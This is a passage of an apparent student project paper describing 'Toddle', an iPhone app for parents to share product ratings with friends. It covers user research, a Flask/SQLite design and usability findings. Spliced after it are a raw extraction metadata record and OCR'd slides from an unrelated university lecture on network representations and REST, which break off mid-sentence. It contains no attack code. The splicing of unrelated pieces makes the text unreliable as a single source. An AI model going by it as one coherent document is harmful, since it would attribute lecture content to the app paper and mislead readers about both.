Social networks are an efficient way for users to share information and media with acquaintances, and particularly with large groups of friends simultaneously. Facebook allows friends to share data and stay connected and is slowly also venturing into e-commerce through Facebook gifts and offers. Pinterest is much more focused on the sharing of photos and is commonly used for sharing ideas, recipes and crafts with others. Unlike Facebook, Pinterest users can choose to see postings made by their "followers" (e.g., friends who are in their Pinterest network) or by the general public, but these websites do not have a product focus. If users do post product photos or reviews, they are not easily searchable and allow for no distinction between products that users own or have used and products that users simply feel like sharing with friends, often because of the product's aesthetics rather than function or safety.
**Online Forums/Groups**
Forums and groups work particularly well for users belonging to specific neighborhoods or age groups. Groups like Berkeley Parents Network and San Francisco Mothers Club are quite popular among women and moms. Users like to share advice and experiences, and these forums have become a default destination for getting a wide range of recommendations and tips. Again, these forums have no specific focus on products or e-commerce.
The user experience is generally limited to lists of archived emails or comments, search is limited to basic keyword searches and the data (recommendation and information) is often outdated and not current. USER RESEARCH Our team conducted an early round of user research followed by a round of user research and usability testing after the first version of our app was completed. In the first round we performed very generalized user interviews of ten people, some with children, some without, and focused on the topics of product purchasing behavior, use of product reviews and ratings, use of mobile and web apps in product purchasing and discovery of new products. In our second round of user research and usability testing, we interviewed six women who either have young children, frequently shop for children’s products or are pregnant to discuss their product purchasing behavior and observe them using our app and our prototype. Three of these women had their children with them at the time of testing. Key Findings Key findings from our first round of user research encouraged us to narrow our focus from the general population to parents of smaller children. In general, people shopped using web and mobile devices in a myriad of ways across many channels and product categories. Building an app that appealed to anyone with a mobile device seemed overly broad and complicated. We contrasted our interviews of people without kids to our interviews of people with smaller children and found that parents, particularly moms, were an interesting customer segment for us as they spent much more time researching a broader range of products than people without kids. Moms relied heavily on reading reviews on Amazon before making purchases, often making those purchases through another retailer. Moms also relied heavily on in-person contact, email and phone conversations to solicit product advice from friends and they did this quite often. Our initial research did not uncover an app that moms used to discover personalized product recommendations or product recommendations from friends. Our second round of user research supported and expanded upon most of our initial findings. Once presented with our concept, moms were interested in the idea and expressed dissatisfaction with their current methods of finding product ratings and recommendations. All of the mothers we interviewed used Amazon to find product reviews and used Facebook, at least in a limited way, to stay in touch with friends, but none of the mothers had used or heard of any services that would allow them to access product recommendations from their friends. The mothers we interviewed all agreed that their friend’s reviews of products were more trustworthy to them than the reviews of parents that they didn’t know. One mom elaborated by saying: “My daughter is only two. We spend a lot of time in play-dates and with other moms and kids. Since she’s so little, I choose her friends and I choose them based on which moms I want to spend time with and who has similar parenting styles to me…I like this idea (toddle) since I choose most of my mom friends based on their values, so I trust their opinions more. I know their opinions are going to be close to mine.” Trust was a continuing theme in some of our user interviews as moms discussed privacy and security. 
While some parents were unconcerned with posting pictures of their kids to websites or writing reviews online using their real names, many parents worried about protecting their own privacy and that of their children. Moms most frequently had issues with posting recognizable photos of their children online where they could be accessed by strangers. Since early versions of our app only allow users to view postings made by their friends, moms felt that the app was private enough for them to feel comfortable posting both pictures and reviews. Interviewees were very divided, however, on other privacy issues. Some moms suggested that postings could be marked as private to friends or public, and that they’d like to be able to see the Toddle postings of users outside their friend network, while others felt that even their network wasn’t private enough. One expectant mother was concerned that within her network, she might not want coworkers, particularly male coworkers, to have the same access to her postings as her non-work friends. She pointed out that she would be more concerned with the privacy of postings for products she used personally, than for products that her child would use. On the other hand, other moms were concerned with the privacy of their kids information or photos but not at all concerned about the privacy of any postings for their own products. Lastly, we gained more insight into the importance of children’s products to parents and the amount of time moms spend researching product performance before making a purchase. Many moms felt that safety was a major reason that they researched children’s products more than they researched other types of products. Moms worried about the physical safety of their kids when products were being used, and the toxicity of products over the long term. Examples that were frequently cited were: the safety of cribs, both the mechanism of moving crib sides and bars, and the ingredients in the crib paint or finish; BPAs in plastic toys and bottles; lead paint being used in toys produced overseas; car seat and stroller safety and reliability; and food pesticides and additives. Overall, moms felt strongly that the products they purchased for their kids would determine their children’s long-term safety, development and happiness whereas products they purchased for themselves had a much shorter term impact of their own well-being. As a result, extensive research was justified. As one mom explained: “You raise your child only once. You want to have the best products that he or she can use in that limited time frame.” DESIGN AND ITERATION We adopted a lean approach to our design and development process, with iterative cycles of brainstorming; product prototyping and development; and user research and testing. After our early phases of user research, we distilled interviews into the key value propositions that an app like ours could offer customers. Once we understood the added value that our app could provide to users, we translated these values to possible features. We then distilled our broad feature list into a ranked list of features, ordered by both importance to users (based on our user research) and our ability to implement features from an engineering perspective. Our first release, or our minimum viable product (MVP), is the smallest feature set that still delivers a coherent, functional application to our users. 
Our MVP features include:
- User login and authentication through Facebook Connect
- Integration with the Facebook SDK to allow users to connect with friends in their Facebook social network
- User posting of product photos taken by either the phone camera or retrieved from the phone's camera roll
- User posting of data related to each product, including: product name, product rating, where the product can be purchased, and comments
- Search functionality that allows users to perform text search for postings by product name and age
- Viewing of posts created by any friends in a user's social network

FUNCTIONAL REQUIREMENTS Social Integration A critical feature of our application is the ability of a user to connect with friends, and therefore friends' recommendations, through our app. Since there are well-established existing social networks that could provide us with a set of friends for each user, we had no interest in building our own social network and forcing users to manually input all of their friends and contacts into our app. Our first round of user interviews indicated that a large percentage of moms have Facebook accounts that they use at least sporadically, so integrating with Facebook would allow us to access the networks of most potential customers. Since Facebook's SDK also provides an authentication system, we chose to use the Facebook SDK for our first version so users can log into our site using their Facebook credentials, giving us access to users' existing social networks. This isn't an ideal long-term solution for us, but it was the easiest and most efficient method for us to allow users quick and safe access to our site and their connections. Some potential users have privacy concerns with allowing our app to access Facebook data, and other users may not even have a Facebook account. In future versions of our product we'd like to allow users to access connections from their phone contacts or import contacts from email. Users without Facebook accounts or users with friends who don't have accounts would then still be able to use our app with all of their acquaintances. We'd also like to allow for creating login credentials during a sign-up process, rather than using Facebook credentials, primarily for the same reasons. Data entry The primary source of data for the application would be user-generated content consisting of product pictures (or perhaps video) with additional metadata on each product. Pictures make the application look more attractive and also provide a visual description of the recommended product. Since all iPhones and iPads come with built-in cameras, users of the app also have easy access to their existing photo streams and the ability to quickly take new photos. Users are also accustomed to seeing pictures on other familiar applications like Facebook and Pinterest. Users will have the ability to take pictures of the products (they love or hate) from inside the app and post them directly into their stream. Additional pieces of information, such as whether they love or hate the product, the age group for which the product is appropriate and the category to which the product belongs, will be required, and users will be able to enter this data by choosing from set values on buttons or in a dropdown list. This allows users to perform data entry quickly. We will keep the amount of required data entry using a keyboard to a minimum, since typing is slow on the phone.
More importantly, this will ensure a consistent quality of data posted and prevent us from having to deal with vocabulary variation when the data is later available to users for filtering or search. In future version of Toddle, our data entry module can be further extended to accept product data by scanning bar or QR codes, or by entering URIs to retrieve product photos and other information from e-commerce providers like Amazon or Etsy. Recommendation Given our target user group’s limited time but their high interest in good quality baby products, we think a love-hate binary model is suitable for them to focus on highly recommended or discouraged products. So far, our user testing in this area is less clear cut, but users we interviewed have indicated that they don’t appreciate “mediocre” or “2.5 star” ratings (on sites such as Amazon where ratings are out of five stars) and that they find these ratings confusing. We want to encourage users to post products to Toddle when they either highly endorse a product and hope their friends buy it, or when they highly dislike a product and want to warn others against purchasing it. By doing this, Toddle can then provide users with a select product list curated by their friends, rather than a more exhaustive list of whatever is on the market. This love-hate recommendation model allows Toddle to start offering more personalized recommendations to our users and differentiates us from sites like Amazon or Babies R Us. In the first version of our app, recommendation posting consists of users entering product name, a product image, age range for which the product is appropriate, product description or comments, and purchase place. Product name, photo image, age range and purchase place are mandatory information, while a description is optional. Users enter text for the product name and the place of purchase. Users can post one product image from their existing photos or by taking a picture instantly and love or hate is entered by selecting from radio buttons. Users can write why they like or dislike the product in a description field to give detailed information to their friends. Our service provides search functionality for users on the product name field or the age group. When a user performs a text search in their product stream, the text entered is queried against the product name field and the age group in our database. Any recommendation postings containing the search text in the product name or in the age group that have been posted by any of the users friends are then displayed. Future versions of our product will also allow users to filter postings by product category and by friend. The first version of our app allowed only the user postings a product to input a comment or description about the product as part of the posting process. In the second version of our service we have added functionality for users to comment on others postings. While reading a recommendation, a user can leave a comment asking for more information from the writer or to agree/disagree with the writer’s rating. These comments become a part of the posting and are visible to any user who can access the post. Technical Architecture The service architecture is based on a client-server model. It is comprised of client iPhone apps and a Web server which houses our database. Users interact with the Toddle app on their iPhone, and the app interacts with our remote Web server using Web service protocols (HTTP GET and POST). 
For user authentication, we use a Facebook authentication module. There are five main information flows among subsystems:
1. Data and photo request and post between iPhone app and Web server
2. Data fetch and upload between Web server and database
3. Photo fetch and upload between Web server and file system
4. User authentication between iPhone app (Facebook SDK) and Facebook server
5. User information request between iPhone app (Facebook SDK) and Facebook server

iOS The Toddle iPhone mobile app is on the client side. It requests recommendation information from our Web server when a user either launches the app or logs in to the app. After receiving recommendation data, it presents this data in a table subview displayed in the user's Stream view. For faster access to information, we apply a 'caching' mechanism that stores data locally in the internal file system of each user's iPhone. When a user logs in or opens Toddle, the app retrieves information from the local file system. Toddle then tries to access the remote Web server to retrieve newly added information that is not in the internal file system. In addition to displaying a recommendation Stream view, Toddle enables users to post their product recommendations and to edit their profile page. Facebook SDK The iPhone app integrates with Facebook's SDK, which connects to a Facebook server for user authentication and user data access. Users log in to Toddle using their Facebook ID. After users log in, our iPhone app can read user information such as name, username, and friend relationships from Facebook. Toddle stores this information in the remote database on our Web server. Whenever a user logs into Facebook, the server checks Facebook's data against the data we've stored in our database to see if any of the social network information has changed. If the data has changed at all, we update the user's information in our database. Web Servers Our Web server runs on Flask, which is a lightweight web framework written in Python. The Web server interacts with Toddle using Web service protocols (HTTP GET and POST) and the JSON format. Upon a data request, the Web server fetches data from our SQLite database, converts it into JSON format, and sends the data to the user's iPhone app. For photo requests, the web server sends the image in the file system to the iPhone app. When the Web server receives post data from a Toddle user, it stores it in the SQLite database. In the case of posted photos, however, the web server saves them in the file system. We explored several platforms for hosting our web server. Our first choice was Heroku, but we couldn't move forward with Heroku due to incompatibilities with the SQLite database that we were using. Instead, we found and decided to use another platform called PythonAnywhere. PythonAnywhere is a Python development and hosting environment that runs in the web browser and hosts applications on PythonAnywhere's servers. We migrated our server-side files from the I School server, where we were temporarily hosting, to PythonAnywhere with no compatibility issues. Database We are using a SQLite database, which integrates easily with Flask. The database stores data in tables on users, relationships, and recommendations. USABILITY TESTING After the first version of our app was built and deployed to phones, usability testing helped us to identify bugs, usability issues and feature requests. In the first version of Toddle, users had trouble properly posting ratings on products.
The rating buttons were located at the bottom of the post page, were not very large, and defaulted to a rating of ‘Love.’ Users frequently missed rating the product so that the default ‘Love’ rating was applied. In version two, we created an additional view for the posting process and moved product name and rating to the first screen of the posting flow. Users take a photo and then are immediately prompted to enter the product name and rating. The rating buttons are larger and placed in the top half of the view. In follow-up usability testing, this redesign helped users post product ratings correctly. In our next release, we will change the rating buttons so that there is no default, making it impossible for users to skip rating a product or to accidentally use a default rating. Usability testing also helped us identify issues with our ratings icons, which are supposed to indicate to users whether the product a user posted was loved or hated. In version one, the rating icon (a heart or broken heart) was located next to product name, under the product photo. While users had an easy time seeing the Love and Hate icons, the placement under the photo caused them to think that the ratings icons were intended to be clickable, and many users thought that they could be used to indicate that a product was a ‘favorite’ or should be on their ‘wish list.’ In our second version of Toddle, we moved the ratings icons so that they cover the top left corner of the product photo. Placing them directly on the photo has helped parents to associate them with the product and users have been much less likely to assume that the icons are clickable. In future versions we will continue to experiment with the design and placement of our ratings system. FUTURE DEVELOPMENT Based on our user research and usability testing of the first and second versions of our app, we prototyped several additional features for the next version of the app that will work well with the basic app and product sharing model. We plan on continuing to develop Toddle and will work on implementing the following features for the next release of our product: **Ask Feature:** Users can ask their Toddle friends for recommendations about products that are not already posted. This feature not only helps users find products they want, but also works as a trigger for content generation. **Sell/Give away feature:** During our early user research we found that kids grew out of products rapidly and often quickly lost interest in a toy as they aged or used it frequently. Parents would either save the products for their next child or give them away to a close relative or friends with kids of a similar age. Parents sometimes also wanted to sell some of the expensive items they had purchased and there were few options for this. Parents had posted items on community forums or on craigslist, but products often didn’t sell or parents were uncomfortable selling items to strangers. Additionally, parents found it awkward to ask friends to pay for their products. We think a Sell/Give away feature will fit well within our current model of product sharing. Users get the best advertising for their products amongst all their friends, who are more likely to have similar tastes. Additionally it also takes away some of the awkwardness that comes with money exchange, by allowing users to post their asking price along with the posts. 
Lastly, allowing parents to sell products through our app provides us with numerous opportunities for future monetization, such as product listing fees, sponsored listings, or commissions on sales. **Comprehensive user profile:** During user research, moms requested more comprehensive user profiles for their friends. They were interested in being able to navigate to a friend's profile and see all of that friend's posts in one place, along with more information on that friend. They were also interested in more features for their own profiles, such as the ability to favorite products, add products to a wishlist and provide their friends with more information on their families. In version three of our app, we plan to provide users with the following:
• A full-featured user profile that allows users to view all their posts in one place
• Users are able to bookmark products and view them at a later time on their profile page
• Users can view Toddle friends and visit friends' profiles

The login and friend-synchronization flow of the app is as follows:
1. The user opens the Toddle app.
2. The app checks through the Facebook API whether the user is logged in; if not, Facebook logs the user in through the API.
3. Once logged in, the app calls the Facebook API to get the user's details, and any new data is saved on our web server.
4. The app calls the Facebook API to get the user's friends and updates the friends table on our web server.
5. The user is shown the Toddle stream view in the app.
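For reference, here is a minimal sketch of how the Flask/SQLite web server described in the Technical Architecture section could expose the stream and posting endpoints. The route names, query parameters and table schema are illustrative assumptions, not our production code.

```python
# Minimal sketch of the server side: Flask + SQLite, speaking JSON over
# HTTP GET/POST. Table and route names are assumptions for illustration.
import sqlite3
from flask import Flask, request, jsonify, g

app = Flask(__name__)
DATABASE = "toddle.db"  # hypothetical database file

def get_db():
    # Open (and cache) one SQLite connection per request context.
    if "db" not in g:
        g.db = sqlite3.connect(DATABASE)
        g.db.row_factory = sqlite3.Row
    return g.db

@app.teardown_appcontext
def close_db(exc):
    db = g.pop("db", None)
    if db is not None:
        db.close()

@app.route("/stream")
def stream():
    """Return postings made by the requesting user's friends as JSON."""
    user_id = request.args.get("user")
    rows = get_db().execute(
        "SELECT p.* FROM postings p "
        "JOIN relationships r ON p.user_id = r.friend_id "
        "WHERE r.user_id = ? ORDER BY p.created_at DESC",
        (user_id,),
    ).fetchall()
    return jsonify([dict(row) for row in rows])

@app.route("/postings", methods=["POST"])
def create_posting():
    """Store a new product recommendation sent by the iPhone app."""
    data = request.get_json()
    get_db().execute(
        "INSERT INTO postings (user_id, product_name, rating, age_range, "
        "purchase_place, comment) VALUES (?, ?, ?, ?, ?, ?)",
        (data["user_id"], data["product_name"], data["rating"],
         data["age_range"], data["purchase_place"], data.get("comment")),
    )
    get_db().commit()
    return jsonify({"status": "ok"}), 201

if __name__ == "__main__":
    app.run()
```

A search endpoint would work the same way, adding a WHERE clause on the product name and age group fields.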
{"Source-Url": "https://www.ischool.berkeley.edu/sites/default/files/student_projects/toddle_masters_paper_0.pdf", "len_cl100k_base": 5481, "olmocr-version": "0.1.53", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 24441, "total-output-tokens": 5966, "length": "2e12", "weborganizer": {"__label__adult": 0.000850677490234375, "__label__art_design": 0.0016603469848632812, "__label__crime_law": 0.0006051063537597656, "__label__education_jobs": 0.00406646728515625, "__label__entertainment": 0.0002684593200683594, "__label__fashion_beauty": 0.0006527900695800781, "__label__finance_business": 0.004955291748046875, "__label__food_dining": 0.0014400482177734375, "__label__games": 0.0020465850830078125, "__label__hardware": 0.0015506744384765625, "__label__health": 0.0007376670837402344, "__label__history": 0.0004949569702148438, "__label__home_hobbies": 0.0013885498046875, "__label__industrial": 0.00031185150146484375, "__label__literature": 0.0007128715515136719, "__label__politics": 0.0003876686096191406, "__label__religion": 0.0004580020904541016, "__label__science_tech": 0.001987457275390625, "__label__social_life": 0.0026607513427734375, "__label__software": 0.037689208984375, "__label__software_dev": 0.93310546875, "__label__sports_fitness": 0.0004086494445800781, "__label__transportation": 0.0011138916015625, "__label__travel": 0.0004901885986328125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 28802, 0.00127]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 28802, 0.01861]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 28802, 0.96329]], "google_gemma-3-12b-it_contains_pii": [[0, 72, false], [72, 3070, null], [3070, 5407, null], [5407, 8382, null], [8382, 11797, null], [11797, 14172, null], [14172, 17459, null], [17459, 20585, null], [20585, 21788, null], [21788, 24820, null], [24820, 28027, null], [28027, 28441, null], [28441, 28802, null]], "google_gemma-3-12b-it_is_public_document": [[0, 72, true], [72, 3070, null], [3070, 5407, null], [5407, 8382, null], [8382, 11797, null], [11797, 14172, null], [14172, 17459, null], [17459, 20585, null], [20585, 21788, null], [21788, 24820, null], [24820, 28027, null], [28027, 28441, null], [28441, 28802, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 28802, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 28802, null]], "pdf_page_numbers": [[0, 72, 1], [72, 3070, 2], [3070, 5407, 3], [5407, 8382, 4], [8382, 11797, 5], [11797, 14172, 6], [14172, 17459, 7], [17459, 20585, 8], [20585, 21788, 9], [21788, 24820, 10], [24820, 28027, 11], [28027, 28441, 12], [28441, 28802, 13]], 
"pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 28802, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
5778317260be69c3abd6df7e1a261ed525c5227e
707.000 Web Science and Web Technology „Web Technologies I“ Markus Strohmaier Univ. Ass. / Assistant Professor Knowledge Management Institute Graz University of Technology, Austria e-mail: markus.strohmaier@tugraz.at web: http://www.kmi.tugraz.at/staff/markus Overview Agenda Technical preliminaries for your first course work: • Network Preliminaries – One Mode and Two Mode Networks – Network Representation – Network Metrics • Software Architecture Preliminaries – REST – JSON • Release of Home Assignment 1.1 Network - A collection of individual or atomic entities - Referred to as nodes or vertices (the “dots” or “points”) - Collection of links or edges between vertices (the “lines”) - Links can represent any pairwise relationship - Links can be directed or undirected - Network: entire collection of nodes and links - For us, a network is an abstract object (list of pairs) and is separate from its visual layout - that is, we will be interested in properties that are invariant - structural properties - statistical properties of families of networks Social Networks Examples Why and How to Flash Your BIOS this url has been saved by 106 people. save this to your bookmarks » user notes Why and How to Flash Your BIOS rslw77 This article is going to focus on the basics and explain ways to flash the BIOS, precautions and how to recover in case of a bad flash. edwinnxk Why and How to Flash Your BIOS (Page 1 of 4 ) Flashing the BIOS is one of the most feared topics related to computers. Yes, people should be very cautious because it can be dangerous. This article is going to focus on the basics and explain ways to flash oblonski One mode / two mode networks (uni/bipartite graphs) One mode network: • A single type of nodes Two mode network: • Two types of nodes • Edges are only possible between different types of nodes How can we represent (social) networks? We will discuss three basic forms: - Adjacency lists - Adjacency matrices - Incident matrices Adjacency Matrix for one mode networks - Complete description of a graph - The matrix is symmetric for nondirectional graphs - A row and a column for each node - Of size $g \times g$ ($g$ rows and $g$ columns) Adjacency matrices for One-Mode Networks taken from http://courseweb.sp.cs.cmu.edu/~cs111/applications/ln/lecture18.html Adjacency matrix or sociomatrix Adjacency lists for One-Mode Networks taken from http://courseweb.sp.cs.cmu.edu/~cs111/applications/ln/lecture18.html Incidence Matrix for One-Mode Networks - (Another) complete description of a graph - Nodes indexing the rows, lines indexing the columns - g nodes and L lines, the matrix I is of size g x L - A "1" indicates that a node $n_i$ is incident with line $l_j$ - Each column has exactly two 1's in it Table 4.3. 
Example of an incidence matrix: “lives near” relation for six children <table> <thead> <tr> <th></th> <th>$l_1$</th> <th>$l_2$</th> <th>$l_3$</th> <th>$l_4$</th> <th>$l_5$</th> <th>$l_6$</th> </tr> </thead> <tbody> <tr> <td>$n_1$</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>$n_2$</td> <td>0</td> <td>0</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>$n_3$</td> <td>0</td> <td>0</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>$n_4$</td> <td>0</td> <td>0</td> <td>0</td> <td>1</td> <td>1</td> <td>0</td> </tr> <tr> <td>$n_5$</td> <td>1</td> <td>0</td> <td>0</td> <td>1</td> <td>0</td> <td>1</td> </tr> <tr> <td>$n_6$</td> <td>0</td> <td>1</td> <td>0</td> <td>0</td> <td>1</td> <td>1</td> </tr> </tbody> </table> [Wasserman Faust 1994] Fig. 3.2. The six actors and the three sets of directed lines — a multivariate directed graph Adjacency lists vs. matrices taken from http://courseweb.sp.cs.cmu.edu/~cs111/applications/ln/lecture18.html Lists Vs. Matrices (I) If the graph is sparse (there aren't many edges), then the matrix will take up a lot of space indicating all of the pairs of vertices which don't have an edge between them, but the adjacency list does not have that problem, because it only keeps track of what edges are actually in the graph. On the other hand, if there are a lot of edges in the graph, or if it is fully connected, then the list has a lot of overhead because of all of the references. Lists Vs. Matrices (II) If we need to look specifically at a given edge, we can go right to that spot in the matrix, but in the list we might have to traverse a long linked list before we hit the end and find out that it is not in the graph. If we need to look at all of a vertex's neighbors, if you use a matrix you will have to scan through all of the vertices which aren't neighbors as well, whereas in the list you can just scan the linked-list of neighbors. Adjacency lists vs. matrices taken from http://courseweb.sp.cs.cmu.edu/~cs111/applications/ln/lecture18.html Lists Vs. Matrices (III) If, in a directed graph, we ask the question, "Which vertices have edges leading to vertex X?", the answer is **straight-forward to find in an adjacency matrix** - we just walk down column X and report all of the edges that are present. But, life isn't so easy with the adjacency list - we actually have to perform a brute-force search. ⇒ So which representation you use depends on what you are trying to represent and what you plan on doing with the graph Illustration! Adjacency matrices for Two-Mode Networks - Complete description of a graph - A row and a column for each node - Of size $m \times n$ (m rows and n columns) ``` <table> <thead> <tr> <th></th> <th>Allison</th> <th>Drew</th> <th>Eliot</th> <th>Keith</th> <th>Ross</th> <th>Sarah</th> </tr> </thead> <tbody> <tr> <td>Party 1</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td>Party 2</td> <td>0</td> <td>1</td> <td>1</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td>Party 3</td> <td>1</td> <td>0</td> <td>1</td> <td>1</td> <td>1</td> <td>0</td> </tr> </tbody> </table> ``` Network Metrics for One-Mode Networks - If the distance between all pairs is finite, we say the network is connected (a single component); else it has multiple components - **Degree of vertex** $v$: number of edges connected to $v$ - **Average degree of vertex** $v$: avg. 
number of edges connected to a vertex Two Mode Networks - Rates of Participation [Wasserman Faust 1994] • The number of events with which each actor is affiliated. • These quantities are either given by – the row totals of affiliation matrix A or – the entries on the main diagonal of the one-mode socio-matrice $X^N$ • Thus, the number of events with which actor $i$ is affiliated is equal to the degree of the node representing the actor in the bipartite graph. • Also interesting: **Average rate of participation** Example: <table> <thead> <tr> <th></th> <th>Party 1</th> <th>Party 2</th> <th>Party 3</th> </tr> </thead> <tbody> <tr> <td>Allison</td> <td>1</td> <td>0</td> <td>1</td> </tr> <tr> <td>Drew</td> <td>0</td> <td>1</td> <td>0</td> </tr> <tr> <td>Eliot</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td>Keith</td> <td>0</td> <td>0</td> <td>1</td> </tr> <tr> <td>Ross</td> <td>1</td> <td>1</td> <td>1</td> </tr> <tr> <td>Sarah</td> <td>1</td> <td>1</td> <td>0</td> </tr> </tbody> </table> Examples: What does the rate of participation relate to in the Netflix / Amazon bipartite graph of customer/movies or customer/products? Two Mode Networks - Size of Events [Wasserman Faust 1994] • The number of actors participating in each event. • The size of each event is given by either – the column totals of the affiliation matrix $A$ or – the entries on the main diagonal of the one-mode sociomatrix $X^M$. • Thus, the size of each event is equal to the degree of the node representing the event in the bipartite graph. • Also interesting: **Average size of events** – Sometimes useful to study average size of clubs or organizations • Size of events might be constrained: – E.g. board of company directors are made up of a fixed number of people Example: <table> <thead> <tr> <th></th> <th>Party 1</th> <th>Party 2</th> <th>Party 3</th> </tr> </thead> <tbody> <tr> <td>Allison</td> <td>1</td> <td>0</td> <td>1</td> </tr> <tr> <td>Drew</td> <td>0</td> <td>1</td> <td>0</td> </tr> <tr> <td>Eliot</td> <td>0</td> <td>1</td> <td>1</td> </tr> <tr> <td>Keith</td> <td>0</td> <td>0</td> <td>1</td> </tr> <tr> <td>Ross</td> <td>1</td> <td>1</td> <td>1</td> </tr> <tr> <td>Sarah</td> <td>1</td> <td>1</td> <td>0</td> </tr> </tbody> </table> Examples: What does the rate of participation relate to in the Netflix / Amazon bipartite graph of customer/movies or customer/products? Network Acquisition on the Web • How can we acquire network information from the web? Example: • RESTful Interfaces REST Roy Fielding, Dissertation 2000 • Roy Fielding - Chief Scientist, Day Software - Co-founder and member, The Apache Software Foundation - Dissertation on Architectural Styles and the Design of Network-based Software Architectures at the Information and Computer Science, UC Irvine In his dissertation, he "introduce[s] the Representational State Transfer (REST) architectural style and describe[s] how REST has been used to guide the design and development of the architecture for the modern Web" Ressources: • http://roy.gbiv.com/talks/200709_fielding_rest.pdf Has played a role in authoring the Internet standards for the Hypertext Transfer Protocol (HTTP) and Uniform Resource Identifiers (URI) The early web Figure 5-5. 
Early WWW Architecture Diagram The Problem (circa 1994) Early architecture was based on solid principles - URLs, separation of concerns, simplicity - lacked architectural description and rationale Protocols assumed a direct server connection - no awareness of caching, proxies, or spiders - many independent extensions Public awareness of the Web was just beginning - exponential growth threatened the Internet - commercialization meant new requirements and new stakeholders A modern Web architecture was clearly needed - but how do we avoid breaking the Web in the process? Software Architectures A software architecture is an abstraction of the runtime elements of a software system during some phase of its operation. A system may be composed of many levels of abstraction and many phases of operation, each with its own software architecture. - A software architecture is defined by a configuration of architectural elements—components, connectors, and data—constrained in their relationships in order to achieve a desired set of architectural properties. - A configuration is the structure of architectural relationships among components, connectors, and data during a period of system run-time. Web Architecture One abstraction level above the implementation Components - User agents, Intermediaries, Servers - Browsers, Spiders, Proxies, Gateways, Origin Servers Connectors - HTTP: a standard transfer protocol to prefer over many Data - URI: one identifier standard for all resources - HTML, XML, RDF, ...: common representation formats to describe and bind resources REST Roy Fielding, RailsConf Europe, September 2007 How beautiful it is to do nothing, and then REST afterward. [Spanish Proverb] Style = nil Starting from a condition of no constraints... No architectural constraints on the roles and features of components, connectors and data, and the allowed relationships among them. REST Roy Fielding, RailsConf Europe, September 2007 Style += Client/Server Apply separation of concerns: Client-Server Representation Data improves UI portability simplifies server enables multiple organizational domains Separation of concerns, scalability REST client-stateless-server (CSS) style Roy Fielding, RailsConf Europe, September 2007 ... and to lie sometimes on the grass ... Style += Stateless Constrain interaction to be stateless... degrades efficiency Repetitive data simplifies server improves scalability improves reliability Visibility – Single request contains all information to understand the full nature of the request Easily free resources Easy recovery each request from client to server must contain all of the information necessary to understand the request REST client-cache-stateless-server style Roy Fielding, RailsConf Europe, September 2007 Style += Caching Add optional non-shared caching - the potential to partially or completely eliminate some interactions - reduces average latency - improves efficiency - improves scalability Cachable vs. 
non-cachable content degraded reliability REST Roy Fielding, RailsConf Europe, September 2007 Style += Uniform Interface Apply generality: uniform interface constraint - improves visibility - independent evolvability - decouples implementation - degrades efficiency information is transferred in a standardized form REST Roy Fielding, RailsConf Europe, September 2007 Style += Layered System Apply info hiding: layered system constraints - Simplifies clients - Improves scalability - Load balancing - Adds latency - Shared caching - Legacy encapsulation Complexity reduction: each component cannot "see" beyond the immediate layer ... or watching the clouds float across the sky, ... REST Style by downloading and executing code in the form of applets or scripts simplifies clients improves extensibility reduces visibility Finally, allow code-on-demand (applets/js) ... is by no means a waste of time. [Sir John Lubbock] Roy Fielding, RailsConf Europe, September 2007 REST Roy Fielding, RailsConf Europe, September 2007 Sometimes the most urgent and vital thing you can possibly do is take a complete REST. [Ashleigh Brilliant] REST on a slide - RR - replicated - Cache on-demand - CS - Client server - stateless - intermediate processing - reliable - cacheable - scalable - LS - Layered System - mobile - shared - multi-org. - VM - Virtual Mach. - extensible - code on demand - reusable - U - simple visible - COD - Code on demand - LC$$SS - Layered client server - extensible - code on demand - reusable - LCODC$$SS - Layered client server - extensible - code on demand - reusable - REST - layered - programmable - uniform interface Client serverCache Why bother? Roy Fielding, Dissertation 2000 - “creating an **architectural model** for how the Web should work” - “Using the new architectural style as a guide, we can **compare proposed extensions and modifications** to the Web architecture against the constraints within the style. **Conflicts** indicate that the proposal would violate one or more of the design principles behind the Web. - For **severe conflicts**, such as a change in the interaction style, the same functionality would **either be replaced** with a design more conducive to the Web's style, or the proposer would be told to implement the functionality as a **separate architecture** running in parallel to the Web.” REMINDER: Web Architecture Roy Fielding, RailsConf Europe, September 2007 Web Architecture One abstraction level above the implementation Components - User agents, Intermediaries, Servers - Browsers, Spiders, Proxies, Gateways, Origin Servers Connectors - HTTP: a standard transfer protocol to prefer over many Data - URI: one identifier standard for all resources - HTML, XML, RDF, ...: common representation formats to describe and bind resources Representations Representations Roy Fielding, Dissertation 2000 • “REST components perform actions on a resource by using a representation to capture the current or intended state of that resource and transferring that representation between components.” • “less precise names for a representation include: document, file, and HTTP message entity, instance, or variant. “ • Depending on the message control data, a given 